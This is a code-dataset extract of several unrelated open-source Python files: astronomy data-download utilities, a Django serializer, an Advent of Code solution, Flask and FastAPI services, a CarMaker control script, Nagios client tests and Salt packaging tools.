cm.gray\n if band == 'WISEW1' or band == 'WISEW2' \\\n or band == 'IRAC1' or band == 'IRAC2' \\\n or band == 'IRAC3' or band == 'IRAC4': return cm.pink\n if band == 'WISEW3' or band == 'WISEW4' \\\n or band == 'MIPS24': return cm.Reds\n if band == 'MIPS70' or band == 'PACS70' or band == 'PACS100' \\\n or band == 'PACS160' or band == 'MIPS160' or band == 'SPIRE250' \\\n or band == 'SPIRE350' or band == 'SPIRE500': return cm.gist_heat\n\ndef round_sig(x, sig = 2):\n try: return round(x, sig-((np.floor(np.log10(abs(x))))-1).astype('int'))\n except: return np.round(x, sig)\n\ndef round_arr(x, sig = 2):\n return np.array([round_sig(el, sig) for el in x])\n\ndef linear_function(B, x):\n '''\n Linear function y = m*x + b\n '''\n # B is a vector of the parameters.\n # x is an array of the current x values.\n # x is in the same format as the x passed to Data or RealData.\n #\n # Return an array in the same format as y passed to Data or RealData.\n return B[0]*x + B[1]\n\ndef pairwise(iterable):\n from itertools import izip\n \"s -> (s0, s1), (s2, s3), (s4, s5), ...\"\n a = iter(iterable)\n return izip(a, a)\n\ndef download_data(galaxy_name, bands_to_download, download_directory, processes = 10):\n from itertools import repeat\n import multiprocessing\n subprocess.call('mkdir '+download_directory.split('/')[0], shell = True)\n subprocess.call('mkdir '+download_directory.split('/')[0]+'/'+download_directory.split('/')[1], shell = True)\n actual_path = os.getcwd()\n os.chdir(download_directory)\n pool = multiprocessing.Pool()\n with multiprocessing.Pool(processes=processes) as pool:\n func = zip(bands_to_download, repeat(galaxy_name))\n pool.starmap(parallel_download, func)\n os.chdir(actual_path)\n return 'All maps have been stored in ' + download_directory\n\ndef parallel_download(band, galaxy_name):\n instrument = str(band.split('_', 1)[0])\n if instrument == 'Spitzer':\n link_path = ' 
\"http://dustpedia.astro.noa.gr/Data/GetImage?imageName='+galaxy_name+'_'+band+'.fits.gz&instrument='+instrument+'\"'\n command = 'wget -cO -'+link_path+' > '+galaxy_name+'_'+band+'.fits.gz'\n subprocess.call(command, shell = True)\n subprocess.call('gunzip '+galaxy_name+'_'+band+'.fits.gz', shell = True)\n else:\n link_path = ' \"http://dustpedia.astro.noa.gr/Data/GetImage?imageName='+galaxy_name+'_'+band+'.fits&instrument='+instrument+'\"'\n command = 'wget -cO -'+link_path+' > '+galaxy_name+'_'+band+'.fits'\n subprocess.call(command, shell = True)\n print('Downloaded '+galaxy_name+'_'+band)\n return\n\ndef download_data_errors(galaxy_name, bands_to_download, download_directory):\n # Sono poche, pesano una sega, non c'è bisogno di ||.\n subprocess.call('mkdir '+download_directory.split('/')[0], shell = True)\n subprocess.call('mkdir '+download_directory.split('/')[0]+'/'+download_directory.split('/')[1], shell = True)\n actual_path = os.getcwd()\n os.chdir(download_directory)\n for band in bands_to_download:\n instrument = str(band.split('_', 1)[0])\n if instrument == 'Spitzer':\n link_path = ' \"http://dustpedia.astro.noa.gr/Data/GetImage?imageName='+galaxy_name+'_'+band+'_Error.fits.gz&instrument='+instrument+'\"'\n command = 'wget -cO -'+link_path+' > '+band+'_Error.fits.gz'\n else:\n link_path = ' \"http://dustpedia.astro.noa.gr/Data/GetImage?imageName='+galaxy_name+'_'+band+'_Error.fits&instrument='+instrument+'\"'\n command = 'wget -cO -'+link_path+' > '+band+'_Error.fits'\n print('Downloading '+galaxy_name+'_'+band+' error map.')\n subprocess.call(command, shell = True)\n os.chdir(actual_path)\n return 'All error maps have been stored in '+download_directory\n \ndef run_CAAPR(galaxy_name):\n actual_path = os.getcwd()\n os.chdir('Caapr')\n subprocess.call('python Caapr_'+galaxy_name[3:]+'.py', shell = True)\n os.chdir(actual_path)\n return 'Done!'\n \n# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n# QUI STO COPIANDO DA CHRIS CLARK\n# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n\ndef Downsample(myarr, factor, estimator=np.nanmean):\n '''\n Keflavich function to downsample an array\n Args: Array to downsample, downsampling factor, and estiamtor\n Returns: Downsampled array\n '''\n ys,xs = myarr.shape\n crarr = myarr[:ys-(ys % int(factor)),:xs-(xs % int(factor))]\n dsarr = estimator( np.concatenate([[crarr[i::factor,j::factor]\n for i in range(factor)]\n for j in range(factor)]), axis=0)\n return dsarr\n\ndef SigmaClip(values, tolerance=0.001, median=False, sigma_thresh=3.0, no_zeros=False):\n '''\n Function to perform a sigma clip upon a set of values\n Args: Array of values, convergence tolerance, state if median instead of mean should be used for clip centrepoint,\n clipping threshold, boolean for whether sigma of zero can be accepted\n Returns: List containing the clipped standard deviation, the average, and the values themselves\n\n '''\n # Remove NaNs from input values\n values = np.array(values)\n values = values[ np.where(np.isnan(values)==False) ]\n values_original = np.copy(values)\n\n # Continue loop until result converges\n diff = 10E10\n while diff>tolerance:\n\n # Assess current input iteration\n if median == False:\n average = np.mean(values)\n elif median == True:\n average = np.median(values)\n sigma_old = np.std(values)\n\n # Mask those pixels that lie more than 3 stdev away from mean\n check = np.zeros([len(values)])\n check[ np.where( values>(average+(sigma_thresh*sigma_old)) ) ] = 1\n check[ np.where( values<(average-(sigma_thresh*sigma_old)) ) ] = 1\n values = values[ 
np.where(check<1) ]\n\n # Re-measure sigma and test for convergence\n sigma_new = np.std(values)\n diff = abs(sigma_old-sigma_new) / sigma_old\n\n # Perform final mask\n check = np.zeros([len(values)])\n check[ np.where( values>(average+(sigma_thresh*sigma_old)) ) ] = 1\n check[ np.where( values<(average-(sigma_thresh*sigma_old)) ) ] = 1\n values = values[ np.where(check<1) ]\n\n # If required, check if calculated sigma is zero\n if no_zeros==True:\n if sigma_new==0.0:\n sigma_new = np.std(values_original)\n if median==False:\n average = np.mean(values)\n elif median==True:\n average = np.median(values)\n\n # Return results\n return [sigma_new, average, values]\n\ndef LogError(value, error):\n '''\n # New function to convert an uncertainty to log space\n # Args: Value, uncertainty\n # Returns: Logarithmic uncertainty (up, down, and mean bw up and down)\n '''\n value, error = np.array(value), np.array(error)\n frac = 1.0 + (error/value)\n error_up = value * frac\n error_down = value / frac\n log_error_up = np.abs( np.log10(error_up) - np.log10(value) )\n log_error_down = np.abs( np.log10(value) - np.log10(error_down) )\n return log_error_up, log_error_down, 0.5*(log_error_up+log_error_down)\n\ndef Most_Common(lst):\n from collections import Counter\n data = Counter(lst)\n return data.most_common(1)[0][0]\n\n######\n\ndef old_download_data(galaxy_name, bands_to_download, download_directory):\n # Ancora non è parallelizzato.\n subprocess.call('mkdir '+download_directory.split('/')[0], shell = True)\n subprocess.call('mkdir '+download_directory.split('/')[0]+'/'+download_directory.split('/')[1], shell = True)\n actual_path = os.getcwd()\n os.chdir(download_directory)\n for band in bands_to_download:\n instrument = str(band.split('_', 1)[0])\n if instrument == 'Spitzer':\n link_path = ' \"http://dustpedia.astro.noa.gr/Data/GetImage?imageName='+galaxy_name+'_'+band+'.fits.gz&instrument='+instrument+'\"'\n command = 'wget -cO -'+link_path+' > '+galaxy_name+'_'+band+'.fits.gz'\n print('Downloading '+galaxy_name+'_'+band)\n subprocess.call(command, shell = True)\n subprocess.call('gunzip '+galaxy_name+'_'+band+'.fits.gz', shell = True)\n else:\n link_path = ' \"http://dustpedia.astro.noa.gr/Data/GetImage?imageName='+galaxy_name+'_'+band+'.fits&instrument='+instrument+'\"'\n command = 'wget -cO -'+link_path+' > '+galaxy_name+'_'+band+'.fits'\n print('Downloading '+galaxy_name+'_'+band)\n subprocess.call(command, shell = True)\n os.chdir(actual_path)\n return 'Done!'\n","repo_name":"AndreaEnia/InRainbows","sub_path":"DustFolder/scripts/GenericUsefulScripts.py","file_name":"GenericUsefulScripts.py","file_ext":"py","file_size_in_byte":20387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"26482611110","text":"from rest_framework import serializers\nfrom .models import Movie\nfrom genres.serializers import GenreSerializer\nfrom genres.models import Genre\n\n\nclass MovieSerializer(serializers.ModelSerializer):\n genres = GenreSerializer(many=True)\n\n def create(self, validated_data: dict) -> Movie:\n\n request_genres = validated_data.pop('genres')\n movie = Movie.objects.create(**validated_data)\n for genre in request_genres:\n genre_request, _ = Genre.objects.get_or_create(**genre)\n movie.genres.add(genre_request)\n return movie\n\n class Meta:\n model = Movie\n fields = [\n \"id\",\n \"title\",\n \"duration\",\n \"premiere\",\n \"budget\",\n \"overview\",\n 'genres'\n 
]\n","repo_name":"jorgekimura2001/projeto-kmdb","sub_path":"movies/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"8758402855","text":"q = [int(line.rstrip()) for line in open(\"day9_input.txt\")]\n\npreambleSize = 25\ndef findNumber(preAmble, q):\n for idx, value in enumerate(q[preAmble:]):\n searchDict = {el:1 for el in q[idx:idx+preAmble]}\n found = False\n for key in searchDict:\n if value - key in searchDict:\n found = True\n break\n if found == False:\n return(value)\n \ntarget = findNumber(preambleSize, q)\n\ncontigIndex = 0\ncontigLength = 0\n\nfor idx,value in enumerate(q):\n contigSum = 0\n iterator = 0\n while(contigSum < target):\n contigSum += q[idx+iterator]\n iterator +=1\n if contigSum == target and iterator > contigLength:\n contigIndex = idx\n contigLength = iterator\n\nsubQ = q[contigIndex:contigIndex+contigLength-1]\n\nprint(\"For part1 answer: \" + str(target) + \" the longest contig of length: \" + str(contigLength) + \" is found at index: \" + str(contigIndex))\nprint(\"So the part2 answer is: \" + str(min(subQ)) + \" + \" + str(max(subQ)) + \" = \" + str(min(subQ)+max(subQ)))","repo_name":"TijmenK/AoC2020","sub_path":"day09.py","file_name":"day09.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"28359111782","text":"from flask import Flask, render_template, request\nimport numpy as np\nimport backtest_webapp\nimport sys\nimport stock_data_webapp\n\napp = Flask(__name__)\n\n@app.route('/', methods=['GET', 'POST'])\ndef main():\n return render_template(\"main.html\")\n\n@app.route('/graphs', methods=['GET', 'POST'])\ndef graphs():\n\n\n args = request.form.to_dict('company')\n\n alpha_API = stock_data_webapp\n stock_df, SYMBOL = alpha_API.get_data(args['company'])\n\n short_window = int(args['short_window'])\n long_window = int(args['long_window'])\n initial_capital = float(args['initial_capital'])\n\n\n app_obj = backtest_webapp\n\n \n n = stock_df.shape[0]\n\n train_start = 0\n train_end = int(np.floor(0.8*n))\n test_start = train_end\n test_end = n\n\n\n graph1_url = app_obj.plot_stock_prices(stock_df, SYMBOL)\n graph2_url = app_obj.arima_plots(stock_df, SYMBOL, train_end, test_end)\n graph3_url, graph4_url, graph5_url, graph6_url = app_obj.lstm_plots(stock_df, SYMBOL, train_start, train_end, test_start, test_end, short_window, long_window, initial_capital)\n \n return render_template('graphs.html',\n graph1=graph1_url,\n graph2=graph2_url,\n graph3=graph3_url,\n graph4=graph4_url,\n graph5=graph5_url,\n graph6=graph6_url)\n \nif __name__ == '__main__':\n app.run(debug=True, host='0.0.0.0', port=80)\n\n","repo_name":"skhan1020/Backtesting-using-AI-in-Algorithmic-Trading","sub_path":"webapp/flask_app.py","file_name":"flask_app.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"19870515499","text":"\nimport fastapi\nfrom fastapi.responses import PlainTextResponse,JSONResponse\nimport os\nfrom src.emailfunctions import EmailFunctions\nfrom src.alertmanagerfunctions import AlertManagerFuncs\nimport logging\n\n\nrouter = fastapi.APIRouter()\n\nnumeric_level = getattr(logging, os.getenv('LOG_LEVEL').upper(), 10)\n# Set up logging\nlogging.basicConfig(\n # level=logging[os.getenv('LOG_LEVEL')],\n level=numeric_level,\n 
format='%(asctime)s %(levelname)s %(module)s:%(lineno)d [RIDE_EMAIL]: %(message)s'\n)\n\nalertmanager_alert_receivers=os.getenv('ALERTMANAGER_DIST_LIST')\nalertmanager_email_templateid=os.getenv('ALERTMANAGER_EMAIL_TEMPLATE_ID')\n\n@router.get('/ping')\nasync def pingmethod():\n return JSONResponse(status_code=200, content={\"status\":\"working\"})\n\n@router.post('/sendbasicemail',response_class=JSONResponse)\nasync def sendbasicemail(payload: dict):\n respstatus = {\"status\": \"failure\"}\n status_code = 500\n try:\n payloadinput = payload.copy()\n templateid=payloadinput['templateid']\n receiver=payloadinput['receiver']\n emailobj=EmailFunctions(os.getenv('GC_API_KEY'),os.getenv('GC_BASE_URL'),logging)\n emailresp=emailobj.sendbasicemail(templateid,receiver)\n if emailresp['status_code']==201:\n respstatus = {\"status\": \"success\",\"resp_id\":emailresp['resp_id']}\n status_code = 200\n else:\n raise Exception(emailresp['err_resp'] )\n except Exception as e:\n print(e)\n respstatus = {\"status\": \"failure\",\"error\":str(e)}\n\n return JSONResponse(status_code=status_code, content=respstatus)\n\n@router.post('/emailpayloadtest',response_class=JSONResponse)\nasync def emailpayloadtest(payload: dict):\n logging.debug(payload)\n respstatus = {\"status\": \"success\"}\n status_code = 200\n return JSONResponse(status_code=status_code, content=respstatus)\n\n@router.post('/alertmanageralerts',response_class=JSONResponse)\nasync def alertmanageralert(payload: dict):\n respstatus = {\"status\": \"failure\"}\n status_code = 500\n try:\n payloadinput = payload.copy()\n templateid = alertmanager_email_templateid\n alertmanagerobj=AlertManagerFuncs(payload,alertmanager_alert_receivers,logging)\n alert_details=alertmanagerobj.parsePayload()\n logging.debug(alert_details)\n emailobj = EmailFunctions(os.getenv('GC_API_KEY'), os.getenv('GC_BASE_URL'), logging)\n emailresp = emailobj.sendalertmanageralert(templateid,alert_details['receiver'],alert_details['subject'],alert_details['message'])\n if emailresp['status_code']==201:\n respstatus = {\"status\": \"success\"}\n status_code = 200\n else:\n raise Exception(emailresp['err_resp'])\n except Exception as e:\n logging.error(e)\n respstatus = {\"status\": \"failure\",\"error\":str(e)}\n return JSONResponse(status_code=status_code, content=respstatus)\n\n","repo_name":"bcgov/rsbc-ride-notification-service","sub_path":"src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"34213194822","text":"# Import the Python libraries (= #include in C)\r\nimport socket\r\nimport time\r\nimport sys, string, os\r\n\r\n# Setting variables\r\n# Path to CM\r\nCM_PATH = \"C:\\\\IPG\\\\carmaker\\\\win64-11.1\\\\bin\\\\CM.exe\"\r\nData_Directory = \"D:\\\\CMProject\\\\CM11\\\\0829test\"\r\n# Computer on which the TCP / IP port is opened\r\nTCP_IP = 'localhost'\r\n# Portnumber\r\nTCP_PORT = 16660\r\nBUFFER_SIZE = 1024\r\n\r\n# \"os.system\" starts a program\r\n# Here: Start of CM.exe with the option -cmdport\r\n# (-> open TCP / IP port on CM side)\r\nos.system(\"%s %s -cmdport %s &\" % (CM_PATH, Data_Directory, TCP_PORT))\r\n\r\n# Wait for CM GUI to start\r\ntime.sleep(2)\r\n\r\n# Open the TCP / IP port in Python\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n# Connect to the CM TCP / IP port 16660 on localhost\r\ns.connect((TCP_IP, TCP_PORT))\r\n\r\n# Send ScriptControl commands over the port\r\n# Several commands per message 
possible; after each command \\r\r\nMESSAGE = \"LoadTestRun Examples/VehicleDynamics/Braking/Braking\\rStartSim\\r\"\r\ns.send(MESSAGE.encode())\r\n\r\nMESSAGE = \"WaitForStatus running\\r\"\r\ns.sendall(MESSAGE.encode())\r\n\r\nwhile 1:\r\n data = s.recv(BUFFER_SIZE)\r\n if '0' in data.decode():\r\n break\r\n\r\nwhile 1:\r\n MESSAGE = \"DVARead Car.v\\r\"\r\n s.send(MESSAGE.encode())\r\n vel = s.recv(BUFFER_SIZE)\r\n vel = (vel.decode()).strip()\r\n vel = float(vel[1:])\r\n print(vel)\r\n\r\n MESSAGE = \"DVARead Time\\r\"\r\n s.send(MESSAGE.encode())\r\n t = s.recv(BUFFER_SIZE)\r\n t = (t.decode()).strip()\r\n t = float(t[1:])\r\n print(t)\r\n\r\n if vel > 10:\r\n MESSAGE = \"DVAWrite DM.Brake 1 1000\\r\"\r\n s.send(MESSAGE.encode())\r\n s.recv(BUFFER_SIZE)\r\n\r\n if t > 30:\r\n MESSAGE = \"StopSim\\r\"\r\n s.send(MESSAGE.encode())\r\n break\r\n\r\n\r\n# Close the port\r\ns.close()\r\n","repo_name":"DDingR/reference_scripts","sub_path":"remoteGUI/[2] PyCM_example.py","file_name":"[2] PyCM_example.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"7162815754","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nUnit tests for Nagios/Icinga 1.x CGI integration\n\"\"\"\n\nfrom __future__ import absolute_import\n\nimport logging\nimport time\nimport pytest\n\nfrom katprep.exceptions import SessionException, UnsupportedRequestException\nfrom katprep.monitoring.nagios import NagiosCGIClient\n\nfrom .utilities import load_config\n\n\n@pytest.fixture(\n params=[\"main\", \"legacy\"],\n ids=[\"Icinga 1\", \"Nagios\"]\n)\ndef nagiosType(request):\n return request.param\n\n\n@pytest.fixture(scope='session')\ndef config():\n return load_config(\"nagios_config.json\")\n\n\n@pytest.fixture\ndef monitoringClient(config, nagiosType):\n try:\n yield NagiosCGIClient(\n logging.ERROR,\n config[nagiosType][\"hostname\"],\n config[nagiosType][\"cgi_user\"],\n config[nagiosType][\"cgi_pass\"],\n verify_ssl=False\n )\n finally:\n time.sleep(8)\n\n\n@pytest.fixture\ndef icingaClient(config):\n try:\n yield NagiosCGIClient(\n logging.ERROR,\n config[\"main\"][\"hostname\"],\n config[\"main\"][\"cgi_user\"],\n config[\"main\"][\"cgi_pass\"],\n verify_ssl=False\n )\n finally:\n time.sleep(8)\n\n\n@pytest.fixture\ndef nagiosClient(config):\n try:\n yield NagiosCGIClient(\n logging.ERROR,\n config[\"legacy\"][\"hostname\"],\n config[\"legacy\"][\"cgi_user\"],\n config[\"legacy\"][\"cgi_pass\"],\n verify_ssl=False\n )\n finally:\n time.sleep(8)\n\n\ndef test_valid_login(monitoringClient):\n \"\"\"\n Ensure exceptions on valid logins\n \"\"\"\n monitoringClient.is_authenticated()\n\n\ndef test_invalid_login(config, nagiosType):\n \"\"\"\n Ensure exceptions on invalid logins\n \"\"\"\n with pytest.raises(SessionException):\n client = NagiosCGIClient(\n logging.ERROR,\n config[nagiosType][\"hostname\"],\n \"giertz\",\n \"paulapinkepank\",\n verify_ssl=False\n )\n client.is_authenticated()\n\n\ndef test_scheduling_downtime_for_host(monitoringClient, config, nagiosType):\n \"\"\"\n Testing downtime scheduling.\n\n Ensure that downtimes can be scheduled, even on ancient systems.\n Ensure that checking downtime is working.\n For Icinga we also ensure that unscheduling downtimes works.\n \"\"\"\n host = config[nagiosType][\"host\"]\n monitoringClient.schedule_downtime(host, \"host\")\n assert monitoringClient.has_downtime(host)\n\n if nagiosType == 'main': # Icinga\n assert 
monitoringClient.remove_downtime(host)\n else: # Nagios\n with pytest.raises(UnsupportedRequestException):\n # try to remove downtime\n monitoringClient.remove_downtime(\"dummy\")\n\n\ndef test_schedule_downtime_hostgrp(icingaClient, config):\n \"\"\"\n Ensure that scheduling downtimes for hostgroups is working\n \"\"\"\n hostgroup = config[\"main\"][\"hostgroup\"]\n assert icingaClient.schedule_downtime(hostgroup, \"hostgroup\")\n\n\ndef test_get_hosts(monitoringClient, config, nagiosType):\n \"\"\"\n Ensure that receiving hosts is possible\n \"\"\"\n hosts = monitoringClient.get_hosts()\n assert config[nagiosType][\"host\"] in [host['name'] for host in hosts]\n\n\ndef test_get_services(monitoringClient, config, nagiosType):\n \"\"\"\n Ensure that hosts include existing services\n \"\"\"\n services = monitoringClient.get_services(\n config[nagiosType][\"host\"], only_failed=False\n )\n assert config[nagiosType][\"host_service\"] in [service['name'] for service in services]\n assert len(services) == config[nagiosType][\"host_services\"]\n","repo_name":"stdevel/katprep","sub_path":"tests/test_NagiosCompatibleCGIClient.py","file_name":"test_NagiosCompatibleCGIClient.py","file_ext":"py","file_size_in_byte":3620,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"78"} +{"seq_id":"12856189924","text":"\"\"\"\nThese commands are used to build Salt packages.\n\"\"\"\n# pylint: disable=resource-leakage,broad-except,3rd-party-module-not-gated\nfrom __future__ import annotations\n\nimport fnmatch\nimport gzip\nimport hashlib\nimport json\nimport logging\nimport os\nimport pathlib\nimport shutil\nimport sys\nimport tarfile\nimport tempfile\n\nimport yaml\nfrom ptscripts import Context, command_group\n\nimport tools.utils\n\nlog = logging.getLogger(__name__)\n\n# Define the command group\npkg = command_group(name=\"pkg\", help=\"Packaging Related Commands\", description=__doc__)\n\n\nclass Recompress:\n \"\"\"\n Helper class to re-compress a ``.tag.gz`` file to make it reproducible.\n \"\"\"\n\n def __init__(self, mtime):\n self.mtime = int(mtime)\n\n def tar_reset(self, tarinfo):\n \"\"\"\n Reset user, group, mtime, and mode to create reproducible tar.\n \"\"\"\n tarinfo.uid = tarinfo.gid = 0\n tarinfo.uname = tarinfo.gname = \"root\"\n tarinfo.mtime = self.mtime\n if tarinfo.type == tarfile.DIRTYPE:\n tarinfo.mode = 0o755\n else:\n tarinfo.mode = 0o644\n if tarinfo.pax_headers:\n raise ValueError(tarinfo.name, tarinfo.pax_headers)\n return tarinfo\n\n def recompress(self, targz):\n \"\"\"\n Re-compress the passed path.\n \"\"\"\n tempd = pathlib.Path(tempfile.mkdtemp()).resolve()\n d_src = tempd.joinpath(\"src\")\n d_src.mkdir()\n d_tar = tempd.joinpath(targz.stem)\n d_targz = tempd.joinpath(targz.name)\n with tarfile.open(d_tar, \"w|\") as wfile:\n with tarfile.open(targz, \"r:gz\") as rfile:\n rfile.extractall(d_src)\n extracted_dir = next(pathlib.Path(d_src).iterdir())\n for name in sorted(extracted_dir.rglob(\"*\")):\n wfile.add(\n str(name),\n filter=self.tar_reset,\n recursive=False,\n arcname=str(name.relative_to(d_src)),\n )\n\n with open(d_tar, \"rb\") as rfh:\n with gzip.GzipFile(\n fileobj=open(d_targz, \"wb\"), mode=\"wb\", filename=\"\", mtime=self.mtime\n ) as gz: # pylint: disable=invalid-name\n while True:\n chunk = rfh.read(1024)\n if not chunk:\n break\n gz.write(chunk)\n targz.unlink()\n shutil.move(str(d_targz), str(targz))\n\n\n@pkg.command(\n name=\"set-salt-version\",\n arguments={\n \"salt_version\": {\n \"help\": (\n \"The salt 
version to write to 'salt/_version.txt'. If not passed \"\n \"it will be discovered by running 'python3 salt/version.py'.\"\n ),\n \"nargs\": \"?\",\n \"default\": None,\n },\n \"overwrite\": {\n \"help\": \"Overwrite 'salt/_version.txt' if it already exists\",\n },\n \"validate_version\": {\n \"help\": \"Validate, and normalize, the passed Salt Version\",\n },\n \"release\": {\n \"help\": \"When true, also update salt/versions.py to set the version as released\",\n },\n },\n)\ndef set_salt_version(\n ctx: Context,\n salt_version: str,\n overwrite: bool = False,\n validate_version: bool = False,\n release: bool = False,\n):\n \"\"\"\n Write the Salt version to 'salt/_version.txt'\n \"\"\"\n salt_version_file = tools.utils.REPO_ROOT / \"salt\" / \"_version.txt\"\n if salt_version_file.exists():\n if not overwrite:\n ctx.error(\"The 'salt/_version.txt' file already exists\")\n ctx.exit(1)\n salt_version_file.unlink()\n if salt_version is None:\n if not tools.utils.REPO_ROOT.joinpath(\".git\").exists():\n ctx.error(\n \"Apparently not running from a Salt repository checkout. \"\n \"Unable to discover the Salt version.\"\n )\n ctx.exit(1)\n ctx.info(\"Discovering the Salt version...\")\n ret = ctx.run(shutil.which(\"python3\"), \"salt/version.py\", capture=True)\n salt_version = ret.stdout.strip().decode()\n ctx.info(f\"Discovered Salt version: {salt_version!r}\")\n elif validate_version:\n ctx.info(f\"Validating and normalizing the salt version {salt_version!r}...\")\n with ctx.virtualenv(\n name=\"set-salt-version\",\n requirements_files=[tools.utils.REPO_ROOT / \"requirements\" / \"base.txt\"],\n ) as venv:\n code = f\"\"\"\n import sys\n import salt.version\n parsed_version = salt.version.SaltStackVersion.parse(\"{salt_version}\")\n if parsed_version.name is None:\n # When we run out of names, or we stop supporting version names\n # we'll need to remove this version check.\n print(\"'{{}}' is not a valid Salt Version.\".format(parsed_version), file=sys.stderr, flush=True)\n sys.exit(1)\n sys.stdout.write(str(parsed_version))\n sys.stdout.flush()\n \"\"\"\n ret = venv.run_code(code, capture=True, check=False)\n if ret.returncode:\n ctx.error(ret.stderr.decode())\n ctx.exit(ret.returncode)\n salt_version = ret.stdout.strip().decode()\n\n if not tools.utils.REPO_ROOT.joinpath(\"salt\").is_dir():\n ctx.error(\n \"The path 'salt/' is not a directory. 
Unable to write 'salt/_version.txt'\"\n )\n ctx.exit(1)\n\n try:\n tools.utils.REPO_ROOT.joinpath(\"salt/_version.txt\").write_text(salt_version)\n except Exception as exc:\n ctx.error(f\"Unable to write 'salt/_version.txt': {exc}\")\n ctx.exit(1)\n\n ctx.info(f\"Successfuly wrote {salt_version!r} to 'salt/_version.txt'\")\n\n version_instance = tools.utils.Version(salt_version)\n if release and not version_instance.is_prerelease:\n with open(tools.utils.REPO_ROOT / \"salt\" / \"version.py\", \"r+\") as rwfh:\n contents = rwfh.read()\n match = f\"info=({version_instance.major}, {version_instance.minor}))\"\n if match in contents:\n contents = contents.replace(\n match,\n f\"info=({version_instance.major}, {version_instance.minor}), released=True)\",\n )\n rwfh.seek(0)\n rwfh.write(contents)\n rwfh.truncate()\n\n ctx.info(\n f\"Successfuly marked {salt_version!r} as released in 'salt/version.py'\"\n )\n\n gh_env_file = os.environ.get(\"GITHUB_ENV\", None)\n if gh_env_file is not None:\n variable_text = f\"SALT_VERSION={salt_version}\"\n ctx.info(f\"Writing '{variable_text}' to '$GITHUB_ENV' file:\", gh_env_file)\n with open(gh_env_file, \"w\", encoding=\"utf-8\") as wfh:\n wfh.write(f\"{variable_text}\\n\")\n\n gh_output_file = os.environ.get(\"GITHUB_OUTPUT\", None)\n if gh_output_file is not None:\n variable_text = f\"salt-version={salt_version}\"\n ctx.info(f\"Writing '{variable_text}' to '$GITHUB_OUTPUT' file:\", gh_output_file)\n with open(gh_output_file, \"w\", encoding=\"utf-8\") as wfh:\n wfh.write(f\"{variable_text}\\n\")\n\n ctx.exit(0)\n\n\n@pkg.command(\n name=\"pre-archive-cleanup\",\n arguments={\n \"cleanup_path\": {\n \"help\": (\n \"The salt version to write to 'salt/_version.txt'. If not passed \"\n \"it will be discovered by running 'python3 salt/version.py'.\"\n ),\n \"metavar\": \"PATH_TO_CLEANUP\",\n },\n \"pkg\": {\n \"help\": \"Perform extended, pre-packaging cleanup routines\",\n },\n },\n)\ndef pre_archive_cleanup(ctx: Context, cleanup_path: str, pkg: bool = False):\n \"\"\"\n Clean the provided path of paths that should not be included in the archive.\n\n For example:\n\n * `__pycache__` directories\n * `*.pyc` files\n * `*.pyo` files\n\n When running on Windows and macOS, some additional cleanup is also done.\n \"\"\"\n with open(\n str(tools.utils.REPO_ROOT / \"pkg\" / \"common\" / \"env-cleanup-rules.yml\")\n ) as rfh:\n patterns = yaml.safe_load(rfh.read())\n\n if pkg:\n patterns = patterns[\"pkg\"]\n else:\n patterns = patterns[\"ci\"]\n\n if sys.platform.lower().startswith(\"win\"):\n patterns = patterns[\"windows\"]\n elif sys.platform.lower().startswith(\"darwin\"):\n patterns = patterns[\"darwin\"]\n else:\n patterns = patterns[\"linux\"]\n\n def unnest_lists(patterns):\n if isinstance(patterns, list):\n for pattern in patterns:\n yield from unnest_lists(pattern)\n else:\n yield patterns\n\n dir_patterns = set()\n for pattern in unnest_lists(patterns[\"dir_patterns\"]):\n dir_patterns.add(pattern)\n\n file_patterns = set()\n for pattern in unnest_lists(patterns[\"file_patterns\"]):\n file_patterns.add(pattern)\n\n for root, dirs, files in os.walk(cleanup_path, topdown=True, followlinks=False):\n for dirname in dirs:\n path = pathlib.Path(root, dirname).resolve()\n if not path.exists():\n continue\n match_path = path.as_posix()\n for pattern in dir_patterns:\n if fnmatch.fnmatch(str(match_path), pattern):\n ctx.info(\n f\"Deleting directory: {match_path}; Matching pattern: {pattern!r}\"\n )\n shutil.rmtree(str(path))\n break\n for filename in files:\n path 
= pathlib.Path(root, filename).resolve()\n if not path.exists():\n continue\n match_path = path.as_posix()\n for pattern in file_patterns:\n if fnmatch.fnmatch(str(match_path), pattern):\n ctx.info(\n f\"Deleting file: {match_path}; Matching pattern: {pattern!r}\"\n )\n try:\n os.remove(str(path))\n except FileNotFoundError:\n pass\n break\n\n\n@pkg.command(\n name=\"generate-hashes\",\n arguments={\n \"files\": {\n \"help\": \"The files to generate the hashes for.\",\n \"nargs\": \"*\",\n },\n },\n)\ndef generate_hashes(ctx: Context, files: list[pathlib.Path]):\n \"\"\"\n Generate \"blake2b\", \"sha512\" and \"sha3_512\" hashes for the passed files.\n \"\"\"\n for fpath in files:\n ctx.info(f\"* Processing {fpath} ...\")\n hashes = {}\n for hash_name in (\"blake2b\", \"sha512\", \"sha3_512\"):\n ctx.info(f\" * Calculating {hash_name} ...\")\n with fpath.open(\"rb\") as rfh:\n try:\n digest = hashlib.file_digest(rfh, hash_name) # type: ignore[attr-defined]\n except AttributeError:\n # Python < 3.11\n buf = bytearray(2**18) # Reusable buffer to reduce allocations.\n view = memoryview(buf)\n digest = getattr(hashlib, hash_name)()\n while True:\n size = rfh.readinto(buf)\n if size == 0:\n break # EOF\n digest.update(view[:size])\n digest_file_path = fpath.parent / f\"{fpath.name}.{hash_name.upper()}\"\n hexdigest = digest.hexdigest()\n ctx.info(f\" * Writing {digest_file_path} 